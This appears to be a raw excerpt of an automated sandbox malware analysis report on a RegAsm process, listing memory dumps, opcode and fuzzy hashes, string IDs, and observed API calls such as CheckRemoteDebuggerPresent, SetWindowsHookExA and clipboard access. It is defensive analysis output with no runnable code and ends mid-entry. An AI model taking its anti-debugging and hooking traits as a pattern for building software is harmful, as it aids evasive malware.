                                • Opcode ID: 0d18dd62c9dd154e421aa4559386db281358165202b1c00a2348a8f24f9e69b3
                                • Instruction ID: e8ae82c88c458683fde75e50b76ed428dcb9074cf5efbe9f4c447c106f9398dd
                                • Opcode Fuzzy Hash: 0d18dd62c9dd154e421aa4559386db281358165202b1c00a2348a8f24f9e69b3
                                • Instruction Fuzzy Hash: 02321F31E1075ACFCB14EF75C89459DB7B2BFC9300F1086AAD419AB264EF30A985CB91

                                 Control-flow Graph (node listing omitted): function starting at 6177d80 in the RegAsm 06170000 region; no imported API calls, calls subroutine 61765a8 from blocks 617817a-6178270 and 6177fcf-6178026.
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: $^q$$^q
                                • API String ID: 0-355816377
                                • Opcode ID: 5143c2da0eca2640bef49d4d5d4230a3e652534b8ea017de20e39fbaf687b954
                                • Instruction ID: e185beeb6c8b731c641c3d0b778c45265f41f8906f866611748ef14fd1868476
                                • Opcode Fuzzy Hash: 5143c2da0eca2640bef49d4d5d4230a3e652534b8ea017de20e39fbaf687b954
                                • Instruction Fuzzy Hash: 5B029C30B006059FDB94DB78D484AAEB7F2EF84304F148969E40ADB395DB31ED86CB91

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: $
                                • API String ID: 0-3993045852
                                • Opcode ID: f41cd36c6fbdc6a5869af46bcdb78413759b9270111770d176a78ec62f2d5b33
                                • Instruction ID: c972a31ae60c4ff576b8434dc44da70954f069ab34a413ba72a197f9b0ae7510
                                • Opcode Fuzzy Hash: f41cd36c6fbdc6a5869af46bcdb78413759b9270111770d176a78ec62f2d5b33
                                • Instruction Fuzzy Hash: A322BE75E002198FDF64DBA8C4806AEBBF3EF89314F248469D449AB385DB31DD46CB91
                                APIs
                                • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 00EA7247
                                Memory Dump Source
                                • Source File: 00000003.00000002.3558473581.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_ea0000_RegAsm.jbxd
                                Similarity
                                • API ID: CheckDebuggerPresentRemote
                                • String ID:
                                • API String ID: 3662101638-0
                                • Opcode ID: 2f8efea0082b58ddc27b1a4816aaf4aeec547521d40a826cd7a3f3f5f3cd0b92
                                • Instruction ID: d0da1bea48e3004bcff8f940a9857387d1567ef6c06fb954d9f449dfa359ed3f
                                • Opcode Fuzzy Hash: 2f8efea0082b58ddc27b1a4816aaf4aeec547521d40a826cd7a3f3f5f3cd0b92
                                • Instruction Fuzzy Hash: 6C2137B2801259CFCB10CF9AD884BEEFBF4AF49324F14846AE459B7250D778A944CF65
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c6d5236192b36c9216d7264641ab72c0067ce2ca34a8131b2f4b01579fe1c14d
                                • Instruction ID: a5745682fc3f4680770bab9e89de96e9d048faad697ede79192b73e5ff44928a
                                • Opcode Fuzzy Hash: c6d5236192b36c9216d7264641ab72c0067ce2ca34a8131b2f4b01579fe1c14d
                                • Instruction Fuzzy Hash: 6B62AF30B006048FDB54DB68D594BADB7F2EF88314F248569E40AEB395DB35ED86CB90
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a7e668f2919e420f2753e8fd2a1adbd6a8f313f99a8580bca2380967cee57bef
                                • Instruction ID: ca429c4e3c84505acd76fec8b42dd396836d3c16c397723098061cffec30aed7
                                • Opcode Fuzzy Hash: a7e668f2919e420f2753e8fd2a1adbd6a8f313f99a8580bca2380967cee57bef
                                • Instruction Fuzzy Hash: 4D329D34B006098FEB54DF68D990BAEB7B2EB88314F10856AE505EB355DB35EC42CB91
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 13ed1c3058228df0dafa392a95027e1315946221e7193751a270b607667e4e5b
                                • Instruction ID: 3034e36d035c2d889249b773451f31aa6f1cd9393443f791253f8ea33d4caa4e
                                • Opcode Fuzzy Hash: 13ed1c3058228df0dafa392a95027e1315946221e7193751a270b607667e4e5b
                                • Instruction Fuzzy Hash: 11225D30E082098FDF64DF68C4907AEB7B2EB89310F248826E459EB395DB35DD85CB51

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                • API String ID: 0-3823777903
                                • Opcode ID: 2eedaeaec0461ca93c356f891fbdff8ce621b311ef5ccf4dae558909ed834410
                                • Instruction ID: 3cdef896dc947a9508e4efa06d13341a2a2896b842f6d573e771baf039383127
                                • Opcode Fuzzy Hash: 2eedaeaec0461ca93c356f891fbdff8ce621b311ef5ccf4dae558909ed834410
                                • Instruction Fuzzy Hash: F2E17E30F102098FDB59DF69D4406AEB7B2EF89304F20896AE405AB355DF75EC46CB91
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                • API String ID: 0-2392861976
                                • Opcode ID: 597cd2259c0123c28cc0de518cdaa3ccf360d8066178c592d17b02452f8898a8
                                • Instruction ID: 7b25606f5a6a3e55885495755a39e05ce4f3840e7c8f393552c8e71973bf0825
                                • Opcode Fuzzy Hash: 597cd2259c0123c28cc0de518cdaa3ccf360d8066178c592d17b02452f8898a8
                                • Instruction Fuzzy Hash: 4F027C30E042098FDFA4CF68D4806AEB7B2FB85314F24896AE415DB355DB35ED85CB91

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: $^q$$^q$$^q$$^q
                                • API String ID: 0-2125118731
                                • Opcode ID: bf4e6ec59ef2b9288ebbc8f07053c93e19d22a01e2e4e58b4430dbef6f19597e
                                • Instruction ID: 0cb9ee7490e588c7b0bb54682d333de9cd4ae63822ebf7251fc94fc2e755efd7
                                • Opcode Fuzzy Hash: bf4e6ec59ef2b9288ebbc8f07053c93e19d22a01e2e4e58b4430dbef6f19597e
                                • Instruction Fuzzy Hash: F7915F30F0420A9FDB54DB75D950BAEB3F6AFC9244F1088A9C409EB384EF709D468B91

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: $^q$$^q$$^q
                                • API String ID: 0-831282457
                                • Opcode ID: 2ed764b7fdce10a94bc6662f256d473a7cb07bb4583ffa4c080c92f45361e464
                                • Instruction ID: 83b644efc9d6672b3de2330d4ef62bdd3573cfb2deeefe071b2de15ea082e9aa
                                • Opcode Fuzzy Hash: 2ed764b7fdce10a94bc6662f256d473a7cb07bb4583ffa4c080c92f45361e464
                                • Instruction Fuzzy Hash: 15624430A006099FDB55EF68E590A5EB7F2FF85304F248969D0099F369DB71ED4ACB80

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: fcq$XPcq$\Ocq
                                • API String ID: 0-3575482020
                                • Opcode ID: a546d8d52165831066aa4cb7b596d86d6c75ac9637da959337e53fed5fef24b1
                                • Instruction ID: 1fbfc08313eaf0a14f895795e877d2e81e9955659e6b395a747fac97e66d8704
                                • Opcode Fuzzy Hash: a546d8d52165831066aa4cb7b596d86d6c75ac9637da959337e53fed5fef24b1
                                • Instruction Fuzzy Hash: 88616230F402189FEB549FB9C8547AEBAF6FF88700F20842AE105AB395DF754D058B95

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: $^q$$^q
                                • API String ID: 0-355816377
                                • Opcode ID: 02b4a3ce13706fbd5daa9401e2f5824cd650091208532f2f0860c5ec944c631f
                                • Instruction ID: 42d7c410da911a00fe2da5ee70a22393dd7e5e8720a95c300328a5e7a3d7456a
                                • Opcode Fuzzy Hash: 02b4a3ce13706fbd5daa9401e2f5824cd650091208532f2f0860c5ec944c631f
                                • Instruction Fuzzy Hash: 0E517030B041059FDB54EBB4D990BAEB3F6ABC9654F1488A9C409EB384EF70DC428B95

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                Memory Dump Source
                                • Source File: 00000003.00000002.3558473581.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_ea0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 65a5df7b01ab27237830f1512330cb356c80c72ddbaedda7d15ac235af99502e
                                • Instruction ID: 60b9cb985f27d300442ce10866ba5eda23c12b692eb5e39f4ec17ecc8b2677fd
                                • Opcode Fuzzy Hash: 65a5df7b01ab27237830f1512330cb356c80c72ddbaedda7d15ac235af99502e
                                • Instruction Fuzzy Hash: 67410332D043958FCB14CFB9D8046EEBFF1AF8A310F1885ABD444A7251DB74A845C791

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 060F2C6A
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561712353.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_60f0000_RegAsm.jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                • Opcode ID: b9977cfc8099dcd30f3fbc9448a2206079f605fdbd01178c5ed15babc4ec9128
                                • Instruction ID: 664f77e321226ff5569bf39ab37bfb825599042be3c673328721acf429bc9de0
                                • Opcode Fuzzy Hash: b9977cfc8099dcd30f3fbc9448a2206079f605fdbd01178c5ed15babc4ec9128
                                • Instruction Fuzzy Hash: BD51D1B1D103499FDB14CFA9C884ADEBFF5BF48310F24852AE818AB210D7759985CF91

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 060F2C6A
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561712353.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_60f0000_RegAsm.jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                • Opcode ID: d7f99288760e5f700e901c610fc43c74f67a4d764b22f27920513ed7ce211a41
                                • Instruction ID: db99a5f5f2f4d01fab22bc2505e8a457e874d4b87a31fbc4087d551555bd2578
                                • Opcode Fuzzy Hash: d7f99288760e5f700e901c610fc43c74f67a4d764b22f27920513ed7ce211a41
                                • Instruction Fuzzy Hash: DA41D0B1D103099FDB14CF9AC884ADEBFF1BF48310F24852AE818AB210D7749985CF91

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                APIs
                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 060F7AF1
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561712353.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_60f0000_RegAsm.jbxd
                                Similarity
                                • API ID: CallProcWindow
                                • String ID:
                                • API String ID: 2714655100-0
                                • Opcode ID: ed3eb24ea322d25c86801c4ebe88390502e4783d7b463e4d0478edc6bd607fc8
                                • Instruction ID: 764c0cfba75322aa3520d12fc59da45bc03c5594cfc215382c7415c520d25522
                                • Opcode Fuzzy Hash: ed3eb24ea322d25c86801c4ebe88390502e4783d7b463e4d0478edc6bd607fc8
                                • Instruction Fuzzy Hash: ED4169B4910349CFDB44CF89D888AAABBF5FF88314F24C859D519AB320C774A841CBA1
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561712353.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_60f0000_RegAsm.jbxd
                                Similarity
                                • API ID: Clipboard
                                • String ID:
                                • API String ID: 220874293-0
                                APIs
                                • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 00EA7247
                                Memory Dump Source
                                • Source File: 00000003.00000002.3558473581.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_ea0000_RegAsm.jbxd
                                Similarity
                                • API ID: CheckDebuggerPresentRemote
                                • String ID:
                                • API String ID: 3662101638-0
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 060F6C27
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561712353.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_60f0000_RegAsm.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                APIs
                                • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,060F7D45), ref: 060F7DCF
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561712353.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_60f0000_RegAsm.jbxd
                                Similarity
                                • API ID: CallbackDispatcherUser
                                • String ID:
                                • API String ID: 2492992576-0
                                APIs
                                • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 060FA1E3
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561712353.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_60f0000_RegAsm.jbxd
                                Similarity
                                • API ID: HookWindows
                                • String ID:
                                • API String ID: 2559412058-0
                                APIs
                                • GlobalMemoryStatusEx.KERNEL32 ref: 00EAF41F
                                Memory Dump Source
                                • Source File: 00000003.00000002.3558473581.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_ea0000_RegAsm.jbxd
                                Similarity
                                • API ID: GlobalMemoryStatus
                                • String ID:
                                • API String ID: 1890195054-0
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000), ref: 060F1B16
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561712353.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_60f0000_RegAsm.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                APIs
                                • OleInitialize.OLE32(00000000), ref: 060F8685
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561712353.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_60f0000_RegAsm.jbxd
                                Similarity
                                • API ID: Initialize
                                • String ID:
                                • API String ID: 2538663250-0
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: XPcq
                                • API String ID: 0-714321711
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: PH^q
                                • API String ID: 0-2549759414
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: |
                                • API String ID: 0-2343686810
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: $^q
                                • API String ID: 0-388095546
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: \Ocq
                                • API String ID: 0-2995510325
                                • Instruction ID: 5ac02a93049311797389657105be5ca366c7c4305a821a03c4b9e69079962599
                                • Opcode Fuzzy Hash: 35f19233d427c28f857f8a84b269aee4259551a9de76fcedf248b25eb9f99730
                                • Instruction Fuzzy Hash: 0C415C71E006099FDF60CFA9D8C0AAEFBF3EB85310F10492AD256D7651DB30E9558B90
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ae74b147a356ca117b274e491b5bb1f5e64e7675494947b2f70f4d3266f5dfe8
                                • Instruction ID: 93e996cd8cc5d607f66c88044e8034bd0f43383834bf557c6f61745f43a5b86a
                                • Opcode Fuzzy Hash: ae74b147a356ca117b274e491b5bb1f5e64e7675494947b2f70f4d3266f5dfe8
                                • Instruction Fuzzy Hash: C5319030E006099FCB19DFA5D85469EBBB6BF8A300F10846AE906EB341DB71E946CB51
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b54f9070df19e5fb6451a225538f86a1d9620085dd80d0d0a58b65dc77b4a592
                                • Instruction ID: 4fda3d00d0c221429584ac94f8c616917f6f24e2f561e9ecfaa155fcd68ba9fb
                                • Opcode Fuzzy Hash: b54f9070df19e5fb6451a225538f86a1d9620085dd80d0d0a58b65dc77b4a592
                                • Instruction Fuzzy Hash: 0F317C30F106199BCB59DFA5D85469EBBF6BF89300F10852AE906EB340DB71ED42CB50
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 66ebbd5b2f9172e5c9558b04ed6d835fd388c697280c583d8846ac21a074cccd
                                • Instruction ID: 690b2717a1322eb6da00fcdb608ea884e05af6eb1c10cb5322767470cb557945
                                • Opcode Fuzzy Hash: 66ebbd5b2f9172e5c9558b04ed6d835fd388c697280c583d8846ac21a074cccd
                                • Instruction Fuzzy Hash: 4921D174F042059FDB50DF79D880AAEBBF6AB88710F148429E959E7384E730E801CB95
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 19fe78c77cf8ffd854cafe9f2da5ddb0c49f7194f45372f233b43716510ef5c8
                                • Instruction ID: 8cc7fcbd3e327a830437855762bd1c5982453253ba49931779477b5e96503cb0
                                • Opcode Fuzzy Hash: 19fe78c77cf8ffd854cafe9f2da5ddb0c49f7194f45372f233b43716510ef5c8
                                • Instruction Fuzzy Hash: BF21B071F046059FDB50DF79D880AAEBBF5EB88710F108029E919EB394E730E801CB94
                                Memory Dump Source
                                • Source File: 00000003.00000002.3557928320.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_c0d000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fd2240c46e0ca7644b28e283c74da643bf81694fa60bdf6df8546699a661d0e4
                                • Instruction ID: d0941d8985701e44c4da4cdae3b71c9554b0e2b238a53f38539eedd79c735fef
                                • Opcode Fuzzy Hash: fd2240c46e0ca7644b28e283c74da643bf81694fa60bdf6df8546699a661d0e4
                                • Instruction Fuzzy Hash: 6B316D7150D3C49FCB03CB64C990711BF71AB46214F29C5DBD9898F2A3C23A980ACB62
                                Memory Dump Source
                                • Source File: 00000003.00000002.3557928320.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_c0d000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cc708803144d428ca377de417a818212973cf546a3d12896d24fd906598568a4
                                • Instruction ID: 2e4a528139204ba7717a95ac00635167f9ac4fa135a482df5efcf354a62d2ed5
                                • Opcode Fuzzy Hash: cc708803144d428ca377de417a818212973cf546a3d12896d24fd906598568a4
                                • Instruction Fuzzy Hash: 97213471604300DFCB10DF54DAC0B26BBA1EB84318F24C56DD80E4B296C73AD847CA62
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 992e2d3ff5095ad70b261792d2b48f8d9331730a2ba606dd75b42c4d2f1aceff
                                • Instruction ID: 9cf963ee0beae6d904a6f07250dcd751ce7fe7c8805fa38c2db78241e111bc0d
                                • Opcode Fuzzy Hash: 992e2d3ff5095ad70b261792d2b48f8d9331730a2ba606dd75b42c4d2f1aceff
                                • Instruction Fuzzy Hash: E211A531B141259FDB589678C8546AF73BAEBC8715F00443AD40AEB340DF64DC029BA1
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a96e33e222538e05b31062da92d9e97da0179356a5254f58213385e118ded1b9
                                • Instruction ID: c106532fc5d2fadd5ddc4ce37a5b65537ad18e1c71fac55de571e51797ffdf0f
                                • Opcode Fuzzy Hash: a96e33e222538e05b31062da92d9e97da0179356a5254f58213385e118ded1b9
                                • Instruction Fuzzy Hash: 95112831B105141FDB65967EE81072BB7EBDBCAB10F14887AF10ACB341EEA5CC424391
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4b4380eff302ba800e30c72bf31395768ece7eb3a32a10017d2dce062e344d8a
                                • Instruction ID: eb08663099c61051d7549ee762b39611fedbcc494254bd7fb29d07a4fa833091
                                • Opcode Fuzzy Hash: 4b4380eff302ba800e30c72bf31395768ece7eb3a32a10017d2dce062e344d8a
                                • Instruction Fuzzy Hash: EA21D3B5D01259AFCB10DF9AD985ADEFFB4FB49324F10812AE918B7200C774A944CFA5
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b639fd049962892877e5b37c4cef53a46b8b5b41e7713ad7304f6d68c01b602f
                                • Instruction ID: 237a2cc61513912de3c4994597e9ca5f033a093224042279a8d43fa85698dc18
                                • Opcode Fuzzy Hash: b639fd049962892877e5b37c4cef53a46b8b5b41e7713ad7304f6d68c01b602f
                                • Instruction Fuzzy Hash: 2401B130B101101FDB659A3D981072E6BE6DBCA610F1448BBE14AC7342EA95DC024395
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 12d222dc5bda9ac426dc4a3ca2551a3c652be8251839b94680ac9f02ddd05555
                                • Instruction ID: fdea906ccae5a250286cce50d96fd7f6579ca7e588adaacc5ddb9a868432d336
                                • Opcode Fuzzy Hash: 12d222dc5bda9ac426dc4a3ca2551a3c652be8251839b94680ac9f02ddd05555
                                • Instruction Fuzzy Hash: 61012432B080645FDB659A78CC246EB77FADBC8710F04493AD08AD7240EFA0980287E2
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 80de45ca18b54920d8c204d5e71f85a4bea4224d0382791e61c9f6e849d0a3a4
                                • Instruction ID: 2f88be9fb2b3360c82d2b170dfee9ae620ac76ad861b001a2a21f506aa9b3440
                                • Opcode Fuzzy Hash: 80de45ca18b54920d8c204d5e71f85a4bea4224d0382791e61c9f6e849d0a3a4
                                • Instruction Fuzzy Hash: 4C11B0B5D01259AFCB00DF9AD984ADEFFB4FB49324F10852AE918B7200C375A954CFA5
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
